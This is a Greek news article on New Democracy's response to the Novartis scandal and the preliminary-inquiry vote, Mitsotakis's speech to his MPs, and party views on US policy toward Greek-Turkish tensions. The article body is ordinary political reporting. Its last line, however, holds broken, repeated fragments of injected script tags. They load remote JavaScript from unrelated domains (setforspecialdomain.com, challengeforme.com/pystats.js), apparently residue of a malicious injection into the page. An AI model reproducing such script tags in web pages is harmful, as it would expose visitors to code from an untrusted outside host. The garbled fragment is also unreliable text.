Γιατί η ΝΔ ζητάει μία και όχι 10 κάλπες για την προανακριτική στο σκάνδαλο Novartis – Μητσοτάκης κατά Τσίπρα Καμμένου Κοτζιά

Τι φοβάται ο Μητσοτάκης. Ο ρόλος Μεϊμαράκη και η εφ’ όλης της ύλης συνάντησή του με τον πρόεδρο της ΝΔ. Πρόβλημα συστράτευσης των γαλάζιων βουλευτών στη γραμμή περί σκευωρίας. Οι προβληματισμοί Ντόρας και Δένδια για το ρόλο των ΗΠΑ στην περιοχή και το ταξίδι Μητσοτάκη στο Μόναχο.

«Την ώρα αυτής της τελευταίας μάχης που δίνουμε, πριν τη μεγάλη πολιτική αλλαγή, απαιτώ από όλους απόλυτη συστράτευση. Δεν θα λύσουμε τις εσωτερικές διαφωνίες, προσωπικές και πολιτικές, που αυτονόητο είναι να υπάρχουν σε κάθε μεγάλο Κόμμα, την ώρα που η Παράταξη δέχεται μια άθλια και συκοφαντική επίθεση» έλεγε χτες ο Κυριάκος Μητσοτάκης στους βουλευτές του κάνοντας έτσι καθαρό με τον πιο σαφή τρόπο ότι παρά τις όποιες προσπάθειες, στη ΝΔ δεν υπάρχει σύμπνοια αυτή τη στιγμή και το σκάνδαλο της Novartis είναι μία μόνο έκφραση του προβλήματος.

Άλλωστε η παρέμβαση Κακλαμάνη, στην κοινοβουλευτική ομάδα  ότι «μας εκφράζει όλους το μήνυμα που εξέφρασε ο Κυριάκος Μητσοτάκης. Ο ΣΥΡΙΖΑ επιχείρησε αλλά δεν το κατάφερε να μας διχάσει στο Σκοπιανό δεν θα το καταφέρει ούτε στη Novartis» είναι η άλλη όψη του προβλήματος καθώς η μισή κοινοβουλευτική ομάδα συμμετείχε στα συλλαλητήρια για τη Μακεδονία σε αντίθεση με την άλλη μισή.

Και στη μία και στην άλλη περίπτωση οι εσωτερικές αντιθέσεις είναι εμφανείς και η πλευρά Σαμαρά και Άδωνι Γεωργιάδη συγκεντρώνει τα κύρια πυρά από την κυβερνητική επίθεση. Αυτό όμως που φοβίζει το Μοσχάτο στην περίπτωση του σκανδάλου της Novartis και πιο συγκεκριμένα στην μυστική ψηφοφορία για τη σύσταση προανακριτικής επιτροπής της βουλής είναι το ότι μπορεί να υπάρξει μεγάλη διαφορά ψήφων υπέρ της σύστασής της για τις περιπτώσεις του πρώην πρωθυπουργού και του αντιπροέδρου της ΝΔ σε αντίθεση πχ με του Eυρωπαίου επιτρόπου Αβραμόπουλου (ύστερα και από την παρέμβαση Καραμανλή) ή του Αντρέα Λυκουρέτζου. Όπως είναι ευνόητο κάτι τέτοιο θα ερμηνευόταν και ως έκφραση πολιτικής αποδοκιμασίας προς τον Αντώνη Σαμαρά και τον Άδωνι Γεωργιάδη από μερίδα της ΝΔ και αυτό θέλει πάση θυσία να το αποφύγει η ΝΔ.

Δεν είναι τυχαίο λοιπόν που ο πρόεδρος της ΝΔ μετά την κοινοβουλευτική ομάδα μίλησε με τους δημοσιογράφους και εξέφρασε την θέση του ότι θα πρέπει να στηθεί μία και όχι δέκα κάλπες για κάθε χωριστό πολιτικό πρόσωπο που φέρεται να εμπλέκεται στο σκάνδαλο. Μάλιστα η ΝΔ επανήλθε χτες βράδυ σημειώνοντας ότι «η κυβέρνηση επιλέγοντας να στήσει 10 κάλπες έχει στόχο με τη συγκεκριμένη μεθόδευση να συνεχίσει το show που έχει οργανώσει και να δημιουργήσει νέες εντυπώσεις με μια προσχηματική ψηφοφορία για δέκα πολιτικούς της αντιπάλους». Τα επιχειρήματα της ΝΔ είναι ότι δεν έχουν απαγγελθεί συγκεκριμένες κατηγορίες κατά κανενός προσώπου και ότι το μόνο που θα κληθεί να αποφασίσει η βουλή είναι αν έχει τη δυνατότητα να διερευνήσει το σκάνδαλο ή αν θα επιστρέψει τη δικογραφία στη βουλή.

Ουσιαστικά η ΝΔ και ο Κυριάκος Μητσοτάκης φοβάται πως στην ψηφοφορία θα εκφραστεί ο εσωτερικός διχασμός της ΝΔ, ο οποίος στην παρέμβαση Μεϊμαράκη χτες στην κοινοβουλευτική ομάδα δεν εκφράστηκε, καθώς απέτρεψε παρεμβάσεις βουλευτών και η συνεδρίαση ολοκληρώθηκε με μόνη ουσιαστικά την εισήγηση του κ. Μητσοτάκη. Μάλιστα οι δύο άνδρες, Μητσοτάκης και Μεϊμαράκης είχαν χτες συνάντηση εφ’ όλης της ύλης για μία ώρα.

Σε κάθε περίπτωση το ζήτημα της εμπλοκής ή μη στελεχών της ΝΔ στο σκάνδαλο της Novartis είναι ιδιαίτερα λεπτό και σοβαρό πολιτικά από τη στιγμή που τα πράγματα αρχίζουν να ξεφεύγουν από τα συνήθη δεδομένα μιας πολιτικής αντιπαράθεσης με την κυβέρνηση. Ο Αντώνης Σαμαράς προχώρησε σε μήνυση κατά του πρωθυπουργού με την πλήρη πολιτική κάλυψη και σε απόλυτη συνεννόηση με τον Κυριάκο Μητσοτάκη. Δεν είναι τυχαίο ότι η δήλωση που συνόδευσε την 56σέλιδη μήνυση ενός τέως πρωθυπουργού κατά του νυν για 7 αδικήματα μεταξύ των οποίων και η σύσταση συμμορίας, έγινε από τα κεντρικά γραφεία της ΝΔ στο Μοσχάτο. Πληροφορίες μάλιστα θέλουνε να ήταν προγραμματισμένη η κατάθεση της μήνυσης δύο μέρες πριν, όμως λόγω Ιμίων μετατέθηκε ακριβώς τη μέρα της κοινοβουλευτικής ομάδας όπου ο Κυριάκος Μητσοτάκης κάλυψε πολιτικά όχι μόνο τον Αντώνη Σαμαρά και τον Άδωνι Γεωργιάδη, αλλά και τους Γιάννη Στουρνάρα και Παναγιώτη Πικραμμένο για τους οποίους έκανε ονομαστική αναφορά.

Προβληματισμός για τη στάση των ΗΠΑ στις ελληνοτουρκικές σχέσεις

Αλλά και στο ζήτημα των ελληνοτουρκικών σχέσεων υπάρχουν αν μη τι άλλο διαφορετικοί χρωματισμοί στις απόψεις κορυφαίων στελεχών σε σχέση με την κεντρική γραμμή, που όπως έχει εκφραστεί από τον τομεάρχη εξωτερικών της ΝΔ Γιώργο Κουμουτσάκο η κυβέρνηση θα πρέπει να θέσει το ζήτημα της τουρκικής προκλητικότητας και επιθετικότητας στους συμμάχους και εταίρους της χώρας. Για παράδειγμα ο Νίκος Δένδιας είναι της άποψης πως οι ΗΠΑ δεν τηρούν ίσες αποστάσεις αλλά στην πραγματικότητα συντάσσονται με την Τουρκία καθώς «οι ίσες αποστάσεις όταν ο ένας αδικεί και ο άλλος αδικείται δεν είναι ίσες, είναι απολύτως άνισες». Αλλά και η Ντόρα Μπακογιάννη είναι της άποψης ότι «το State Department καλεί και τις δύο πλευρές για αποκλιμάκωση, ενώ είναι μία πλευρά είναι αυτή που κλιμακώνει» και επιπρόσθετα θεωρεί ότι «η ευρωπαϊκή πίεση δεν λαμβάνεται πλέον σοβαρά υπόψη από την τουρκική πλευρά».

Ο Κυριάκος Μητσοτάκης ενόψει και της μετάβασής του σήμερα στο Μόναχο για την 54 η διάσκεψη ασφάλειας είχε σύσκεψη χτες με την Ντόρα Μπακογιάννη, το Νίκο Δένδια και το Βαγγέλη Μεϊμαράκη, και συζήτησαν γύρω από τα ζητήματα της εξωτερικής πολιτικής με αιχμή τα ελληνοτουρκικά και τις εξελίξεις με την ΠΓΔΜ, ενώ στην ομιλία του στην κοινοβουλευτική ομάδα απέφυγε να κάνει αναφορές για το ρόλο των εταίρων στην ΕΕ και το ΝΑΤΟ εστιάζοντας κυρίως σε μια ολομέτωπη επίθεση προς την κυβέρνηση την οποία εγκάλεσε για «ψεύτικο πατριωτισμό» και «εθνικές υποχωρήσεις».

 

Μητσοτάκης κατά Τσίπρα Καμμένου Κοτζιά: Έσπειραν ψεύτικο πατριωτισμό και θερίζουν εθνικές υποχωρήσεις

Εργαλείο εξόντωσης των πολιτικών της αντιπάλων η δικαιοσύνη στα χέρια του ΣΥΡΙΖΑ. Να έρθουν οι κουκουλοφόροι στη βουλή. Πλήρης κάλυψη σε Σαμαρά Γεωργιάδη και Πικραμένο. Ζήτησε συστράτευση από τους βουλευτές του λέγοντας ότι δεν είναι ώρα για διαφωνίες.

Ολομέτωπη επίθεση εξαπέλυσε ο Κυριάκος Μητσοτάκης για τα εθνικά θέματα, την οικονομία και το σκάνδαλο Novartis, κατηγορώντας την κυβέρνηση για «υπονόμευση της ίδιας της αστικής φιλελεύθερης δημοκρατίας».

Ο Κυριάκος Μητσοτάκης μίλησε για «χαλκευμένα κατηγορητήρια» στην περίπτωση της Νοβάρτις την οποία χαρακτήρισε «εργαλείο» στα χέρια της κυβέρνησης με στόχο την «εξόντωση των βασικών πολιτικών αντιπάλων του ΣΥΡΙΖΑ», έκανε ονομαστική αναφορά στον Αντώνη Σαμαρά τον Άδωνι Γεωργιάδη και τον Παναγιώτη Πικραμένο και μάλιστα επέμεινε στην άποψη περί «άθλιας σκευωρίας» και μαρτύρων κουκουλοφόρων, ζητώντας την παρουσία τους στην προανακριτική επιτροπή της βουλής για κατ’ αντιπαράσταση εξέταση με τους εμπλεκόμενους «ακόμα και φορώντας τις κουκούλες» όπως ανέφερε χαρακτηριστικά, ενώ κατηγόρησε επίσης την κυβέρνηση ότι επιχειρεί συγκάλυψη του Παναγιώτη Κουρουμπλη και άλλων στελεχών του ΣΥΡΙΖΑ.

Ο πρόεδρος της ΝΔ είπε ακόμη ότι το σκάνδαλο της Novartis  σε ότι αφορά την εμπλοκή πολιτικών προσώπων είναι «ο πιο προβλέψιμος αντιπερισπασμός μιας κυβέρνησης που ψυχορραγεί» γιατί «δεν βγαίνει το success story» και η πολιτική της έχει επιπτώσεις αρνητικές στην οικονομία και τα εθνικά θέματα.

Ο αρχηγός της αξιωματικής αντιπολίτευσης καταλόγισε ακόμη «πολιτική ανευθυνότητα και διαπραγματευτική ανικανότητα» στο Σκοπιανό, ενώ και στα ελληνοτουρκικά  κινήθηκε στο ίδιο μήκος κύματος, εξαπολύοντας επίθεση με βαρείς πολιτικούς χαρακτηρισμούς κατά του Αλέξη Τσίπρα του Νίκου Κοτζιά και ιδίως του Πάνου Καμμένου λέγοντας ότι «κάποιοι έσπειραν ψεύτικο πατριωτισμό και θερίζουν εθνικές υποχωρήσεις. Σοβαρή εξωτερική πολιτική με στολές παραλλαγής δεν γίνεται. Δεν είναι καρναβάλι όλο το χρόνο» τόνισε μεταξύ άλλων ο κ. Μητσοτάκης.

«Δεν είναι ώρα για εσωκομματικές διαφωνίες»

Πάντως η συνεδρίαση της κοινοβουλευτικής ομάδας ολοκληρώθηκε χωρίς παρεμβάσεις βουλευτών μόνο με την ομιλία του Κυριάκου Μητσοτάκη. Οι πληροφορίες αναφέρουν ότι μόλις τέλειωσε ο πρόεδρος της ΝΔ, ο τέως πρόεδρος του κόμματος Βαγγέλης Μεϊμαράκης εκτός μικροφώνου είπε «πρόεδρε η ομιλία σου μας κάλυψε όλους», ενώ αμέσως ο Νικήτας Κακλαμάνης παρενέβη από μικροφώνου και ανέφερε: «Μας εκφράζει όλους το μήνυμα που εξέφρασε ο Κυριάκος Μητσοτάκης ο ΣΥΡΙΖΑ επιχείρησε αλλά δεν το κατάφερε να μας διχάσει στο Σκοπιανό δεν θα το καταφέρει ούτε στη Νοβάρτις» και κάπου εκεί ολοκληρώθηκε η διαδικασία.

Επισημαίνεται πάντως ότι ο Κυριάκος Μητσοτάκης σε κάποια αποστροφή του λόγου του κατά την εισήγησή του είχε αναφέρει ότι «αυτή την ώρα απαιτώ τη μεγαλύτερη συστράτευση. Δεν θα λύσουμε τώρα τις εσωτερικές διαφωνίες μας που υπάρχουν γιατί αυτή την ώρα η παράταξη δέχεται μια άθλια συκοφαντική επίθεση».

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >